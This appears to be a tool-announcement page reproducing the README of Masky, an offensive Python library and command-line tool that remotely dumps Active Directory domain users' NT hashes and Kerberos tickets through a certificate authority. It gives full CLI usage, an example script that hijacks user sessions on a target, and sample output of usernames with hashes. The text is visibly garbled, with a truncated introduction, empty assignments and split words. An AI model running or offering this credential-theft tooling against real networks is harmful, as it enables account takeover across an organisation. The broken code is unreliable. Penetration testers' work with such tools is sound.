Masky – Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory

Masky is a

Masky also provides options that are commonly provided by such tools (thread number, authentication mode, targets loaded from files, etc. ).

  __  __           _
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usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]

positional arguments:
targets Targets in CIDR, hostname and IP formats are accepted, from a file or not

-h, --help show this help message and exit
-v, --verbose Enable debugging messages
-ts, --timestamps Display timestamps for each log
-t THREADS, --threads THREADS
Threadpool size (max 15)

-d DOMAIN, --domain DOMAIN
Domain name to authenticate to
-u USER, --user USER Username to au thenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)

-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
Certificate Authority Name (SERVERCA_NAME)

-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folde r if it does not exit)

Python library

Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.

from masky import Masky
from getpass import getpass

def dump_nt_hashes():
# Define the authentication parameters
ca = "srv-01.sec.labsec-SRV-01-CA"
dc_ip = ""
domain = "sec.lab"
user = "askywalker"
password = getpass()

# Create a Masky instance with these credentials
m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)

# Set a target and run Masky against it
target = ""
rslts =

# Check if Masky succesfully hijacked at least a user session
# or if an unexpected error occured
if not rslts:
return False

# Loop on MaskyResult object to display hijacked users and to retreive their NT hashes
print(f"Results from hostname: {rslts.hostname}")
for user in rslts.users:
print(f"t - {user.domain}{user.n ame} - {user.nt_hash}")

return True

if __name__ == "__main__":

Its execution generate the following output.

$> python3
Results from hostname: SRV-01
- sechsolo - 05ff4b2d523bc5c21e195e9851e2b157
- secaskywalker - 8928e0723012a8471c0084149c4e23b1
- secadministrator - 4f1c6b554bb79e2ce91e012ffbe6988a

A MaskyResults object containing a list of User objects is returned after a successful execution of Masky.

Please look at the module to check the methods and attributes provided by these two classes.


  • Olivier Lyak for the Certipy tool and the associated articles
  • Will Schroeder and Lee Christensen for the Certify tool and the Certified Pre-Owned article
  • Dirk-jan for the PKINITtools and its ADCS NTLM relay article
  • SecureAuthCorp and the associated contributors for the Impacket library
  • Pixis for the tool Lsassy
  • Incognito tool and its Metasploit implementation
  • S3cur3Th1sSh1t for the tool SharpImpersonation and the associated article
  • McAfee for their article regarding the token impersonation techniques
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